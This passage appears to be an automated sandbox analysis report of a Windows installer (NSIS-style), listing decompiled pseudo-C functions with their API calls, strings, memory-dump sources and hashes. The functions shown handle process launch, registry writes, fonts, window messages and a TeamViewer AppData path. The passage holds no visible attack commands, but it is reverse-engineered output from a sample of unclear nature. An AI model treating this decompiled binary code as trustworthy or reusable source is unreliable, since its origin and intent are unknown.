                                                                                                                        				void* _t33;
                                                                                                                        				signed int _t35;
                                                                                                                        				signed int _t38;
                                                                                                                        				unsigned int _t45;
                                                                                                                        
                                                                                                                        				_t45 = _a12;
                                                                                                                        				_push(0x14);
                                                                                                                        				_pop(0);
                                                                                                                        				_t33 = 0xffffffdc;
                                                                                                                        				if(_t45 < 0x100000) {
                                                                                                                        					_push(0xa);
                                                                                                                        					_pop(0);
                                                                                                                        					_t33 = 0xffffffdd;
                                                                                                                        				}
                                                                                                                        				if(_t45 < 0x400) {
                                                                                                                        					_t33 = 0xffffffde;
                                                                                                                        				}
                                                                                                                        				if(_t45 < 0xffff3333) {
                                                                                                                        					_t38 = 0x14;
                                                                                                                        					asm("cdq");
                                                                                                                        					_t45 = _t45 + 1 / _t38;
                                                                                                                        				}
                                                                                                                        				_push(E00405B88(_t33, 0, _t45,  &_v36, 0xffffffdf));
                                                                                                                        				_push(E00405B88(_t33, 0, _t45,  &_v68, _t33));
                                                                                                                        				_t21 = _t45 & 0x00ffffff;
                                                                                                                        				_t35 = 0xa;
                                                                                                                        				_push(((_t45 & 0x00ffffff) + _t21 * 4 + (_t45 & 0x00ffffff) + _t21 * 4 >> 0) % _t35);
                                                                                                                        				_push(_t45 >> 0);
                                                                                                                        				_push("%u.%u%s%s");
                                                                                                                        				_t26 = E00405B88(_t33, 0, 0x4204a0, 0x4204a0, _a8);
                                                                                                                        				_push(0x4204a0);
                                                                                                                        				L00405B7C();
                                                                                                                        				wsprintfA(_t26 + _t26);
                                                                                                                        				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                                                        • wsprintfA.USER32 ref: 00404787
                                                                                                                        • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        • Opcode ID: c1bf9231fe92aebf28e2bf8449a75e77e369f05ec6904c2f29ee4e7a53275fee
                                                                                                                        • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                                                        • Opcode Fuzzy Hash: c1bf9231fe92aebf28e2bf8449a75e77e369f05ec6904c2f29ee4e7a53275fee
                                                                                                                        • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 51%
                                                                                                                        			E00401BAD() {
                                                                                                                        				signed int _t28;
                                                                                                                        				CHAR* _t31;
                                                                                                                        				long _t32;
                                                                                                                        				int _t37;
                                                                                                                        				signed int _t38;
                                                                                                                        				int _t42;
                                                                                                                        				int _t48;
                                                                                                                        				struct HWND__* _t52;
                                                                                                                        				void* _t55;
                                                                                                                        
                                                                                                                        				 *(_t55 - 0x34) = E004029D9(3);
                                                                                                                        				 *(_t55 + 8) = E004029D9(4);
                                                                                                                        				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                                                                                                        					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
                                                                                                                        				}
                                                                                                                        				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                                                                                                        				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                                                                                                        					 *(_t55 + 8) = E004029F6(0x44);
                                                                                                                        				}
                                                                                                                        				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                                                                                                        				_push(1);
                                                                                                                        				if(__eflags != 0) {
                                                                                                                        					_t50 = E004029F6();
                                                                                                                        					_t28 = E004029F6();
                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                        					asm("sbb eax, eax");
                                                                                                                        					_t31 =  ~( *_t27) & _t50;
                                                                                                                        					__eflags = _t31;
                                                                                                                        					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                                                                                        					goto L10;
                                                                                                                        				} else {
                                                                                                                        					_t52 = E004029D9();
                                                                                                                        					_t37 = E004029D9();
                                                                                                                        					_t48 =  *(_t55 - 0x10) >> 2;
                                                                                                                        					if(__eflags == 0) {
                                                                                                                        						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                                                                                                        						L10:
                                                                                                                        						 *(_t55 - 8) = _t32;
                                                                                                                        					} else {
                                                                                                                        						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                                                                                        						asm("sbb eax, eax");
                                                                                                                        						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                                                                                                        				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                                                                                                        					_push( *(_t55 - 8));
                                                                                                                        					E00405AC4();
                                                                                                                        				}
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                                        • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                                                        • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                                        • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004053C6(CHAR* _a4) {
                                                                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                                                                        				int _t7;
                                                                                                                        
                                                                                                                        				0x4224a8->cb = 0x44;
                                                                                                                        				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
                                                                                                                        				if(_t7 != 0) {
                                                                                                                        					CloseHandle(_v20.hThread);
                                                                                                                        					return _v20.hProcess;
                                                                                                                        				}
                                                                                                                        				return _t7;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                                                        • Error launching installer, xrefs: 004053D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                                        • API String ID: 3712363035-4043152584
                                                                                                                        • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                                        • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                                                        • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                                        • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E00405659(void* __eax, char* _a4) {
                                                                                                                        				char* _t6;
                                                                                                                        
                                                                                                                        				_t6 = _a4;
                                                                                                                        				_push(_t6);
                                                                                                                        				L00405B7C();
                                                                                                                        				if( *(CharPrevA(_t6, __eax + _t6)) != 0x5c) {
                                                                                                                        					_push(0x409010);
                                                                                                                        					_push(_t6);
                                                                                                                        					L00405B82();
                                                                                                                        				}
                                                                                                                        				return _t6;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                                                        • lstrcat.KERNEL32(?,00409010), ref: 00405679
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-3936084776
                                                                                                                        • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                        • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                                                        • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                        • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E00402303(void* __eax) {
                                                                                                                        				void* _t15;
                                                                                                                        				char* _t18;
                                                                                                                        				int _t19;
                                                                                                                        				char _t24;
                                                                                                                        				void* _t25;
                                                                                                                        				int _t26;
                                                                                                                        				intOrPtr _t34;
                                                                                                                        				void* _t36;
                                                                                                                        
                                                                                                                        				_t15 = E00402AEB(__eax);
                                                                                                                        				_t34 =  *((intOrPtr*)(_t36 - 0x14));
                                                                                                                        				 *(_t36 - 0x30) =  *(_t36 - 0x10);
                                                                                                                        				 *(_t36 - 0x44) = E004029F6(2);
                                                                                                                        				_t18 = E004029F6(0x11);
                                                                                                                        				_t30 =  *0x423f50 | 0x00000002;
                                                                                                                        				 *(_t36 - 4) = 1;
                                                                                                                        				_t19 = RegCreateKeyExA(_t15, _t18, _t26, _t26, _t26,  *0x423f50 | 0x00000002, _t26, _t36 + 8, _t26);
                                                                                                                        				if(_t19 == 0) {
                                                                                                                        					if(_t34 == 1) {
                                                                                                                        						_t25 = E004029F6(0x23);
                                                                                                                        						_push(0x40a370);
                                                                                                                        						L00405B7C();
                                                                                                                        						_t19 = _t25 + 1;
                                                                                                                        					}
                                                                                                                        					if(_t34 == 4) {
                                                                                                                        						_t24 = E004029D9(3);
                                                                                                                        						 *0x40a370 = _t24;
                                                                                                                        						_t19 = _t34;
                                                                                                                        					}
                                                                                                                        					if(_t34 == 3) {
                                                                                                                        						_t19 = E00402F18(_t30,  *((intOrPtr*)(_t36 - 0x18)), _t26, 0x40a370, 0xc00);
                                                                                                                        					}
                                                                                                                        					if(RegSetValueExA( *(_t36 + 8),  *(_t36 - 0x44), _t26,  *(_t36 - 0x30), 0x40a370, _t19) == 0) {
                                                                                                                        						 *(_t36 - 4) = _t26;
                                                                                                                        					}
                                                                                                                        					_push( *(_t36 + 8));
                                                                                                                        					RegCloseKey();
                                                                                                                        				}
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *(_t36 - 4);
                                                                                                                        				return 0;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                                                        • lstrlen.KERNEL32(0040A370,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A370,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A370,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1356686001-0
                                                                                                                        • Opcode ID: c2905ab82e3d4f742e931df821d979397d372fc6ead50470bf6aaaad3d431b7f
                                                                                                                        • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                                                        • Opcode Fuzzy Hash: c2905ab82e3d4f742e931df821d979397d372fc6ead50470bf6aaaad3d431b7f
                                                                                                                        • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 43%
                                                                                                                        			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				void* _t29;
                                                                                                                        
                                                                                                                        				_t18 = E004029F6(0xffffffee);
                                                                                                                        				 *((intOrPtr*)(_t29 - 0x2c)) = _t18;
                                                                                                                        				_push(_t29 - 0x30);
                                                                                                                        				_push(_t18);
                                                                                                                        				L00406A54();
                                                                                                                        				 *__esi = __ebx;
                                                                                                                        				 *((intOrPtr*)(_t29 - 8)) = _t18;
                                                                                                                        				 *__edi = __ebx;
                                                                                                                        				 *((intOrPtr*)(_t29 - 4)) = 1;
                                                                                                                        				if(_t18 != __ebx) {
                                                                                                                        					__eax = GlobalAlloc(0x40, __eax);
                                                                                                                        					 *(__ebp + 8) = __eax;
                                                                                                                        					if(__eax != __ebx) {
                                                                                                                        						_push(__eax);
                                                                                                                        						_push( *((intOrPtr*)(__ebp - 8)));
                                                                                                                        						_push(__ebx);
                                                                                                                        						_push( *((intOrPtr*)(__ebp - 0x2c)));
                                                                                                                        						L00406A4E();
                                                                                                                        						if(__eax != 0) {
                                                                                                                        							__eax = __ebp - 0x44;
                                                                                                                        							_push(__ebp - 0x44);
                                                                                                                        							__eax = __ebp - 0x34;
                                                                                                                        							_push(__eax);
                                                                                                                        							_push(0x409010);
                                                                                                                        							_push( *(__ebp + 8));
                                                                                                                        							L00406A48();
                                                                                                                        							if(__eax != 0) {
                                                                                                                        								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                                                                                                        								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                                                                                                        								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_push( *(__ebp + 8));
                                                                                                                        						GlobalFree();
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t29 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • 746814E0.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                                        • 746814C0.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                                        • 74681500.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: 746814$74681500AllocGlobalwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4143394720-0
                                                                                                                        • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                                        • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                                                        • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                                        • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 33%
                                                                                                                        			E00401D1B() {
                                                                                                                        				void* __esi;
                                                                                                                        				int _t5;
                                                                                                                        				int _t6;
                                                                                                                        				signed char _t11;
                                                                                                                        				struct HFONT__* _t14;
                                                                                                                        				void* _t18;
                                                                                                                        				void* _t24;
                                                                                                                        				void* _t26;
                                                                                                                        				void* _t28;
                                                                                                                        
                                                                                                                        				_t5 =  *0x407238( *((intOrPtr*)(_t28 - 0x34)), 0x5a, 0x48);
                                                                                                                        				_t6 =  *0x407040();
                                                                                                                        				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, _t5));
                                                                                                                        				 *0x40af84 = E004029D9(3);
                                                                                                                        				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                                                                        				 *0x40af8b = 1;
                                                                                                                        				 *0x40af88 = _t11 & 0x00000001;
                                                                                                                        				 *0x40af89 = _t11 & 0x00000002;
                                                                                                                        				 *0x40af8a = _t11 & 0x00000004;
                                                                                                                        				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
                                                                                                                        				_t14 = CreateFontIndirectA(0x40af74);
                                                                                                                        				_push(_t14);
                                                                                                                        				_push(_t26);
                                                                                                                        				E00405AC4();
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • 73BBAC50.USER32(?,0000005A,00000048), ref: 00401D22
                                                                                                                        • 73BBAD70.GDI32(00000000), ref: 00401D29
                                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                        • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFontIndirect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3720817429-0
                                                                                                                        • Opcode ID: 65d6d6c3eade4a3ebb09d4d6b1d43c63415d6ff7796dc61260d2c7023a1fee7c
                                                                                                                        • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                                                        • Opcode Fuzzy Hash: 65d6d6c3eade4a3ebb09d4d6b1d43c63415d6ff7796dc61260d2c7023a1fee7c
                                                                                                                        • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 62%
                                                                                                                        			E00402020() {
                                                                                                                        				intOrPtr* _t49;
                                                                                                                        				intOrPtr* _t51;
                                                                                                                        				intOrPtr* _t53;
                                                                                                                        				intOrPtr* _t55;
                                                                                                                        				signed int _t59;
                                                                                                                        				intOrPtr* _t60;
                                                                                                                        				intOrPtr* _t63;
                                                                                                                        				intOrPtr* _t65;
                                                                                                                        				intOrPtr* _t67;
                                                                                                                        				intOrPtr* _t70;
                                                                                                                        				intOrPtr* _t72;
                                                                                                                        				int _t76;
                                                                                                                        				signed int _t82;
                                                                                                                        				intOrPtr* _t89;
                                                                                                                        				void* _t96;
                                                                                                                        				void* _t97;
                                                                                                                        				void* _t101;
                                                                                                                        
                                                                                                                        				 *(_t101 - 0x30) = E004029F6(0xfffffff0);
                                                                                                                        				_t97 = E004029F6(0xffffffdf);
                                                                                                                        				 *((intOrPtr*)(_t101 - 0x2c)) = E004029F6(2);
                                                                                                                        				 *((intOrPtr*)(_t101 - 8)) = E004029F6(0xffffffcd);
                                                                                                                        				 *((intOrPtr*)(_t101 - 0x44)) = E004029F6(0x45);
                                                                                                                        				if(E004056C6(_t97) == 0) {
                                                                                                                        					E004029F6(0x21);
                                                                                                                        				}
                                                                                                                        				_push(_t101 + 8);
                                                                                                                        				_push(0x407374);
                                                                                                                        				_push(1);
                                                                                                                        				_push(_t76);
                                                                                                                        				_push(0x407384);
                                                                                                                        				if( *0x407284() < _t76) {
                                                                                                                        					L13:
                                                                                                                        					 *((intOrPtr*)(_t101 - 4)) = 1;
                                                                                                                        					_push(0xfffffff0);
                                                                                                                        				} else {
                                                                                                                        					_t49 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        					_t96 =  *((intOrPtr*)( *_t49))(_t49, 0x407394, _t101 - 0x34);
                                                                                                                        					if(_t96 >= _t76) {
                                                                                                                        						_t53 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        						_t96 =  *((intOrPtr*)( *_t53 + 0x50))(_t53, _t97);
                                                                                                                        						_t55 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        						 *((intOrPtr*)( *_t55 + 0x24))(_t55, "C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer");
                                                                                                                        						_t82 =  *(_t101 - 0x14);
                                                                                                                        						_t59 = _t82 >> 0x00000008 & 0x000000ff;
                                                                                                                        						if(_t59 != 0) {
                                                                                                                        							_t89 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        							 *((intOrPtr*)( *_t89 + 0x3c))(_t89, _t59);
                                                                                                                        							_t82 =  *(_t101 - 0x14);
                                                                                                                        						}
                                                                                                                        						_t60 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        						 *((intOrPtr*)( *_t60 + 0x34))(_t60, _t82 >> 0x10);
                                                                                                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t101 - 8)))) != _t76) {
                                                                                                                        							_t72 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        							 *((intOrPtr*)( *_t72 + 0x44))(_t72,  *((intOrPtr*)(_t101 - 8)),  *(_t101 - 0x14) & 0x000000ff);
                                                                                                                        						}
                                                                                                                        						_t63 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        						 *((intOrPtr*)( *_t63 + 0x2c))(_t63,  *((intOrPtr*)(_t101 - 0x2c)));
                                                                                                                        						_t65 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        						 *((intOrPtr*)( *_t65 + 0x1c))(_t65,  *((intOrPtr*)(_t101 - 0x44)));
                                                                                                                        						if(_t96 >= _t76) {
                                                                                                                        							_t96 = 0x80004005;
                                                                                                                        							if(MultiByteToWideChar(_t76, _t76,  *(_t101 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
                                                                                                                        								_t70 =  *((intOrPtr*)(_t101 - 0x34));
                                                                                                                        								_t96 =  *((intOrPtr*)( *_t70 + 0x18))(_t70, 0x409368, 1);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t67 =  *((intOrPtr*)(_t101 - 0x34));
                                                                                                                        						 *((intOrPtr*)( *_t67 + 8))(_t67);
                                                                                                                        					}
                                                                                                                        					_t51 =  *((intOrPtr*)(_t101 + 8));
                                                                                                                        					 *((intOrPtr*)( *_t51 + 8))(_t51);
                                                                                                                        					if(_t96 >= _t76) {
                                                                                                                        						_push(0xfffffff4);
                                                                                                                        					} else {
                                                                                                                        						goto L13;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				E00401423();
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t101 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}





















                                                                                                                        APIs
                                                                                                                        • 7629B690.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Roaming\TeamViewer, xrefs: 004020AB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: 7629B690ByteCharMultiWide
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\TeamViewer
                                                                                                                        • API String ID: 2244051918-4213038595
                                                                                                                        • Opcode ID: 8bdc297386af4af811401e14d97a43bdbeccf624015d579e5e20aa8428512c8b
                                                                                                                        • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                                                        • Opcode Fuzzy Hash: 8bdc297386af4af811401e14d97a43bdbeccf624015d579e5e20aa8428512c8b
                                                                                                                        • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00403978(void* __ecx, void* __eflags) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				signed short _t6;
                                                                                                                        				intOrPtr _t11;
                                                                                                                        				signed int _t13;
                                                                                                                        				signed int _t16;
                                                                                                                        				signed short* _t18;
                                                                                                                        				signed int _t20;
                                                                                                                        				signed short* _t23;
                                                                                                                        				intOrPtr _t25;
                                                                                                                        				signed int _t26;
                                                                                                                        				intOrPtr* _t27;
                                                                                                                        
                                                                                                                        				_t24 = "1033";
                                                                                                                        				_t13 = 0xffff;
                                                                                                                        				_t6 = E00405ADD(__ecx, "1033");
                                                                                                                        				while(1) {
                                                                                                                        					_t26 =  *0x423ee4;
                                                                                                                        					if(_t26 == 0) {
                                                                                                                        						goto L7;
                                                                                                                        					}
                                                                                                                        					_t16 =  *( *0x423eb0 + 0x64);
                                                                                                                        					_t20 =  ~_t16;
